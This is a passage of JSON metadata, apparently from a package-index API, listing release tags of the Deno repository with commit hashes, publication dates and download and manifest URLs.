"dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/r